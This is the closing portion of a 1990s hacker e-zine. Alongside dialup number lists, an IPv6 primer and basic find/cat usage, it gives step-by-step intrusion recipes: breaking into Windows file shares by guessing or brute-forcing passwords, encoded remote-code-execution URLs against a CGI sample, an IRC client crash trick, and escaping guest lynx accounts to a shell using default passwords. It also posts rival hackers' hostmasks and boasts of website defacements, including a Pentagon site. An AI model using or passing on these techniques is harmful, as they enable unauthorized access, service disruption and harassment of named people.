01452-307766 Gloucester
01245-492460 Chelmsford
01289-308668 Berwick
01633-244456 Newport (Gwent)
01302-340698 Doncaster
01492-517111 Colwyn Bay
01792-475533 Swansea
01743-241631 Shrewsbury
01734-351616 Reading
01302-200636 Dundee
01642-225226 Teeside
01865-749555 Oxford
0161-941-6319 Manchester
01482-446444 Hull
0151-691-1312 Liverpool
BT PSS Dialups
--------------
01232-331284 Belfast
0161-834-5533 Manchester
0171-490-2200 London
0151-255-0230 Liverpool
0121-633-3474 Birmingham
0117-211545 Bristol
01492-860500 Llandudno
01522-532398 Lincoln
01639-641650 Neath
0141-204-1722 Glasgow
01533-628092 Leicester
01463-711940 Inverness
0171-283-9123 London
0181-681-5040 London
01889-576610 Rugeley
01227-762950 Canterbury
01539-561263 Sedgwick
01424-722788 Hastings
01228-512621 Carlisle
0181-905-9099 London
01532-440024 Leeds
01865-798949 Oxford
01245-491323 Chelmsford
01654-703560 Machynlleth
01733-555705 Peterborough
01472-353550 Grimsby
01752-603302 Plymouth
01603-763165 Norwich
01202-666461 Poole
01793-541620 Swindon
01270-588531 Crewe
01772-204405 Preston
01734-500722 Reading
091-261-6858 Newcastle-on-Tyne
01582-481818 Luton
01872-223864 Truro
01709-820402 Rotherham
01895-846091 Warminster
0131-313-2137 Edinburgh
01926-451419 Leamington Spa
01732-740966 Sevenoakes
01602-506005 Nottingham
01392-421565 Exeter
01743-231027 Shrewsbury
01273-550045 Brighton
01422-349224 Halifax
01703-634530 Southampton
01242-227547 Cheltenham
01823-335667 Taunton
01597-825881 Llandrindod Wells
01553-691090 Kings Lynn
01222-344184 Cardiff
01642-245464 Middlesbrough
01473-210212 Ipswich
01223-460127 Cambridge
01904-625625 York
01224-210701 Aberdeen
Sprintnet
---------
0171-973-1030 London
Tymnet
------
0131-313-2172 Edinburgh
0181-566-7260 London
01223-845860 Cambridge
0117-255392 Bristol
01232-234467 Belfast
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. A short introduction to IPv6 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
IPv6 is described in detail in RFC 1884, It is commonly noted as the "Next
Generation Internet Addressing System", IPv4 had some shortcomings that became
obvious once the internet had grown substantially in size and complexity, the
main factor was that IPv4 used 32-bit address sizes, whereas IPv6 can allocate
128-bit addresses..
IPv6 address representation is much like that of IPv4, because the addresses
are represented in strings of digits divided by seperators, but IPv6 addresses
differ in that they take the form nn:nn:nn:nn:nn:nn:nn:nn, where each nn
represents the hexidecimal form of 16 bits of address. IPv6 also differs in
more complex ways, but this is just an introduction...For the full details
see RFC 1884.
IPv6 has identified 3 types of address, these are unicast, multicast and
anycast, here is a neat ascii diagram to explain the 3 different types...
Unicast :
---------
Host 1
Host 2
IP Packet -------------------------------> Host 3
Host 4
Host 5
Multicast :
-----------
Host 1
/------> Host 2
/ and
IP Packet -------------------------------> Host 3
\ and
\------> Host 4
Host 5
Anycast :
---------
/--> Host 1
/ or
/------> Host 2
/ or
IP Packet -------------------------------> Host 3
\ or
\------> Host 4
\ or
\--> Host 5
So thats basically whats so neat about IPv6, if you want to know the formats
for the unicast, multicast and anycast addresses, then read RFC 1884.
Summary..
---------
IPv6 offers a more permenant solution, as it incorporates flexible address
space, as well as support for accessing the public internet and private
IP-based networks from the existing enterprise LANs and WANs.
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Newbie sk00l : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This time we will learn how to use the find and cat commands effectively..
cat
===
usage : cat [options] [files]
options :
----------
-e : Print a $ to mark the end of each line
-n : Print the number of the output line to the lines
left; start with 1
-s : Squeeze out extra blank lines
-t : Print each tab as I^ and each form feed as L^
-v : Show control and nonprinting characters
-a : same as -vet
examples :
----------
cat ch1 : display a file
cat ch1 ch2 ch3 > all : combine files to form 'all'
cat note5 >> notes : append note5 to the notes file
cat note5 > notes : overwrite notes with note5
cat > temp1 : create a file, end with EOF
cat > temp2 << STOP : create a file, end with STOP
find
====
usage : find [pathnames] [conditions]
examples :
----------
find $HOME -print : lists files and subdirectories in
your home directory.
find /work -name letter -print : looks for letter starting its
scan in the /work directory
find /work -name 'memo*' -user ann : looks for any files beginning
with memo, owned by ann
find / -size 0 -ok rm {} \; : looks for, and removes all files
that are 0 bytes, prompts you
before removal
One very good book with such commands in, that I recommend, is...
Linux In A Nutshell
Jessica Hekman
O'Reiley
ISBN 1-56592-167-4
US $19.95
CAN $28.95
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Windows NT filesharing basics : chameleon
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Now to you NT gurus this is all very basic but since most of you are
Unix hackers you probably dont know shit about windows. It is a must
to start learning Windows now (heh -so1o). NT is getting big. More and
more each day people are starting to use it. Yes I agree I hate NT
and love a good 'ole Unix box but we must keep up with technology.
NT is widely used even by places like the Pentagon. (*cough* it was
easy to hack *cough*)
Ok class lets start...
Say you have an IP address that you want to try and get access to
you would do this...
Example for IP address: 194.8.235.73
Note: Use IP addresses because the name address sometimes wont work
and the IP will so use IP addresses.
Drop to dos...
c:\windows> nbtstat -A 194.8.235.73
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MAILGATE <00> UNIQUE Registered
MAILGATE <03> UNIQUE Registered
MAILGATE <1F> UNIQUE Registered
MAILGATE <20> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MIRAGE <00> GROUP Registered
MIRAGE <1D> UNIQUE Registered
MIRAGE <1E> GROUP Registered
MAC Address = 00-00-00-00-00-00
---------------------------------------------------------------------
|Note: this will list the remote hosts name. The name is set in the |
|control pannel/networking/indentification/computername. |
---------------------------------------------------------------------
Now that you have the computer name you need to tell windows the IP that
maps to that computer name. So to do this you need to edit
c:\windows\lmhosts open it in notepad or whatever. It will look like this...
127.0.0.1 localhost
you want to add the ip 194.8.235.73 and then press tab and enter the
computer name. so the new hosts file will look like this.
127.0.0.1 localhost
194.8.235.73 MAILGATE
This sets up a computer name mapping to the IP address of the computer
to try and get into its filesharing. Save this and then click your Start
Button then goto find, then computer, then enter the computer name and it
will connect to that computer name that you added into the hosts file.
It should show the computer as being found. Double click it and then if
your lucky it wont have a password but if you aren't you will be prompted
for a password which you will have to try and guess or use a brute force
cracking program.
Solar Designer also coded and distributed some Windows NT and 95 remote
buffer overflows, here are his 2 main examples...the URL's have been
split into seperate lines so we can see them :
-- WinNT (any version?):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm
-- Win95 (the release version only, will crash others!):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm
You can change the commands in each case, using _ instead of a space.
Note that the server should respond to these exploits with an
"Error: no blank line separating header and data", because of the
"1 file(s) copied" message appearing without a blank line before it
(which is required for HTTP; if you need a command's output, you can
redirect it to a file, and get that file via HTTP with a separate request).
Hope this was a little help. If not at least you know how to use windows
file sharing...
Anyone good at coding in windows? Wanna code a brute force hacking program
for windows file sharing? E-Mail me...
The Chameleon
Chameleon@intercore.com.ar
InterCore Security Corp.
http://chameleon.core.com.ar
http://www.intercore.com.ar
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. BitchX / crackrock bug : so1o / Shok
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is another bug along the lines of the one that causes BitchX clients to
segfault if a particular mode is set in a channel..
The bug was originally found by Shok, it's just a quick thing, nothing special,
just for novelty value really, this is what you do...
1) join a channel with a { character in the name
2) set the topic to something with more than 20 characters
Now, if anyone using BitchX and crackrock joins your channel, they will
segfault and quit, in tests however, this showed to sometimes take a short
while (usually about a minute) before they quit..
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Nifty Lynx trick : Electric Nectar
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Ok so you're trying to get a valid account on a server for whatever
reasons. (busting root, taking a look around, etc.) You've tried telneting
to port 79, 25, and got a couple valid accounts, and have tried hopelessly
to just guess the passwords. This is not the approach to take.
Throughout my experience, while trying to gain a valid account on
various servers, I've run into many that run a guest lynx account.
The purpose of this account is just what it sounds like, it gives no access
to the server itself, but rather let's you only run lynx (a unix-based, text only,
web browser). The account is designed to be accessed by outsiders. The most
common lynx login's and passwords are:
-lynx/lynx
-guest/guest
-guest/lynx
-www/wwww
-www/lynx
Ok well I think you get the idea, be creative if one doesn's work.
First off though, you need to make sure the account exists. Simply telnet
to port 79, and try typing in a possible lynx account name. If it varifies it
your set. Now if 79 isn't open, just telnet to port 25, and type
'vrfy username'; username being the name of a guest lynx account. This too
will varify the account. Here's an example...
Finger:
Trying...
Connected to host.com
Escape character is '^]'.
lynx
Login name: lynx In real life: Lynx Guest Account
Directory: /home/lynx Shell: /usr/bin/lynx
No Plan.
Smtp:
Trying...
Connected to host.com
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 - 0400
vrfy lynx
252 <lynx@host.com>
Now remember, a lynx guest account isn't a common thing on most
servers, although I have seen it on quite a few. This is just an alternate
plan of getting a shell on an otherwise, unaccessable server, if the situation
exists. If you cannot validate a guest lynx account, don't be surprised.
Next order of business is to login of course. It should be fairly
simple. Since it is a guest lynx account, the login and password should be
somewhat obvious, usually the password is the same as the login....
$ telnet host.com
Trying...
Connected to host.com
Escape character is '^]'.
Linux 2.0.29 (host.com) (ttyp0)
Welcome to Linux 2.0.29.
host login: lynx
Password:
Linux 2.0.29.
Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com
You have new mail.
...Ok, your terminal should look something like this...
----------------------------------------------------------------------------
Lynx
(default page crap here)
_________________________________________________________________
-- press space for next page --
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------
...Now the following trick is something I developed after several
minutes of devising a plan to make lynx pop me into a shell. Now that you
are in lynx, hit 'O' for the options menu. Ok the options menu should come up,
let's take a look at it...
-----------------------------------------------------------------------------
Options Menu (Lynx Version 2.6)
E)ditor : NONE
D)ISPLAY variable : NONE
B)ookmark file : lynx_bookmarks.html
F)TP sort criteria : By Filename
P)ersonal mail address : NONE
S)earching type : CASE INSENSITIVE
display (C)haracter set : ISO Latin 1
Raw 8-bit or CJK m(O)de : ON
preferred document lan(G)uage: en
preferred document c(H)arset : NONE
V)I keys : OFF
e(M)acs keys : OFF
K)eypad mode : Numbers act as arrows
li(N)e edit style : Default Binding
l(I)st directory style : Mixed style
sho(W) dot files : OFF
U)ser mode : Novice
user (A)gent : Lynx/2.6 libwww-FM/2.14
Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
-----------------------------------------------------------------------------
Notice the E)ditor option. That's what we're after. The purpose of it is to
edit the file currently open in lynx with the supplied text editor. Lynx
usually expects you to put in something like joe, pico, vi, etc. But we can
supply anything we want, and it will use it with the syntax:
[editor] <file open in lynx>
Ok, here's where we get inovative. Hit 'E' to type in an editor. For the
editor, type: exec. Ah yes, those of experience are now starting to nod
their heads. Now hit 'shift+period key' or '>' to save the options. You
now return to the default screen. Next step. Hit 'g'. You will be prompted
to enter a URL. For the URL put the following:
file://localhost/bin/sh
If all goes according to plan, /bin/sh will open as binary garbage
in lynx. Now, normally if you hit 'e' with a default text editor set in
the options menu, it would edit /bin/sh as a text file. But thanks to our
little exec fix, it will now exec /bin/sh. And we all know what that does:
pops us into a bash shell! Here's an example of the act in progress...
-----------------------------------------------------------------------------
ELF4ð?4 (444 ÔÔÔéééyyÌH¬[Ä1ÄÁÄÁ/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST
eP{ut!i:@%`Mb9Aq7>=.~ZGFY/<Ccrz'*w,]RhO6X?(4
p\Jf2-
v^}1#k;lK_V3$E0nyID¸"ØC&ÄÁñÿ/XY5Tpæ <xäN¸"TÈ<["bH3kyuÃxP~X"¨ªè&(Í¡H"©öìÈ"²
è"¹øáÁ`§
ÇØ8Îô¿ñÿä8 éøÃì¸góø<ûX"
XÂüÃ$Ã4¸6:hA"HxcO@V<ü- \#eØ"kcs8¹{y ¤¡ (""È"¡h"©¸B°H&·(JÁË8&Õ¨"Ú¨"ä¨Mîh"úø"""h
è&%HM/h"48"9¨×?XE<M¸"Y(C"`&"jà v"~èf"hc\ È"¡8"©X"±"¶"½¸"Ã"Çø"Ì"Óx"ØX"â"êx"ï"õ"
úø"è"H"È"8""#¨"-È"5H"?("D>OôÃ]ØPc¸ÂToh"w"~È&"`ÂTè("X& è$«H@³ ÃT¾h"Åø"ÌØ"Ô&"Ûø"ä
("íØG"öØbýxWx<"x<¨Ì(F*l0j98tBK\ÂRÃ_T§ñÿfTÂñÿmTÂñÿy4Õñÿlibtermcap.so.2strcpyioct
ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB
C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB
AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype
_toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm
atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact
ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq
sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate
rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll
seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp
-- press space for next page --
Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------
...If you look in the very bottom left corner you will see it! (bash$)
A simple 'clear' command will get rid of the rest of that mess. Often times the
TERM setting will be all messed up. Simply fix that by typing:
TERM=vt100 export TERM
And there you have it folks! a bash shell popped off of a lynx guest
account. Now feel free to look around, run a few exploits, whatever, what you
do beyond here is totally up to you. Hope you enjoyed today's little lesson,
and I hope you get a chance to put it to work sometime. Take it easy all.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. No-more negative : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Over the last few months, starting roughly in April 1997, myself, D-Storm and
a few others have been playing around with sIn (lame Windows coding group,
think they're all big and bad, when they are really quite cl00le$$), we
found out certain members names and addresses, as well as hacking their
website in August - www.sinnerz.com (as promised back in April by myself),
the hack is documented at www.hacked.net under the August exploited section.
In a way, this has lead to a handful of their members leaving the group
after realising how much they are hated, as well as their webpage being taken
down due to the fact that lameass LordSomer hacked it after we did, so it's
not all dandy in the lame world of sIn after all, its all falling apart at
the seams..
So we have decided that from now on, we won't waste our time with this dead
group, they have been proven beyond all doubt to be the lame and weak, and
now it's time to let them rest in peace, we have set out what we intended to
do, and now it's over, we proved our point in the end.
Fucking Hostile and The Banshee and are the only real members of sIn still
around, they keep changing their nicks on irc to hide their identity, so
we have decided to post their hostmasks, as a final reminder, that they
will never be forgotten as the fools they were proven to be..
Fucking Hostile : *!hostile@*.qni.com
The Banshee : *!bob@*.accessmd1.dataplace.net
so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Pentagon hacked : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
chameleon of the carparts crew (#carparts on undernet), used his elite Windows
NT tekneeqs to break into, and modify the .html on...
http://www.pentagon-ai.army.mil
The details of the hack are fully documented on www.hacked.net, under the
October exploited section, notice the greet to CodeZero, heh.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. TOTALCON '98 : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+------------------------------------+------------------------------------+
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
+------------------------------------+------------------------------------+
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
TotalCon '98 is now a reality, here are preliminary details...
==============================================================
Venue : The Old Firestation, Silver Street, Bristol, ENGLAND
Date : Late March 1998 (probably the last week)
Duration : 36 hours non-stop (midday -> 10:00pm next day)
Cost : 15 (15 UKP) ON THE DOOR, this will go back into
the event (beer etc.)
What : 12 system network (with additional terminals) along
with full internet access, bring your laptops!
Loud music, live DJ's
Fully licensed bar downstairs / next door
Elite UV and spotlighting
ALOT of cool people
^^^^^^^^^^^^^^^^^^^
*** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER ***
Travel : Easily accessible by car, train, bus, plane or boat.
Accomodation : You can hang around the Firestation or book one of
many good hotels in the immediate area.
Notes : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL
GO BACK INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS
OF BEER AND FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!!
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+------------------------------------+------------------------------------+
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
Ý An Official TotalCon Announcement Ý An Official TotalCon Announcement Ý
+------------------------------------+------------------------------------+
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.-----------[ An Official ]-----------.
: .-----. .----. .--.--. :
: : .--' : .-. : : : : :
!_-:: : : : `-' ; : . : ::-_!
:~-:: :: : :: . : :: : ::-~:
: ::.`--. ::.: : ::.: : :
: `-----' `--'--' `--'--' :
!_-:: ::-_!
:~-::-[ Confidence Remains High ]-::-~:
:~-:: ::-~:
`-----------[ Production ]------------'
w3 r00l, ph34r 0ur tekn33k
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
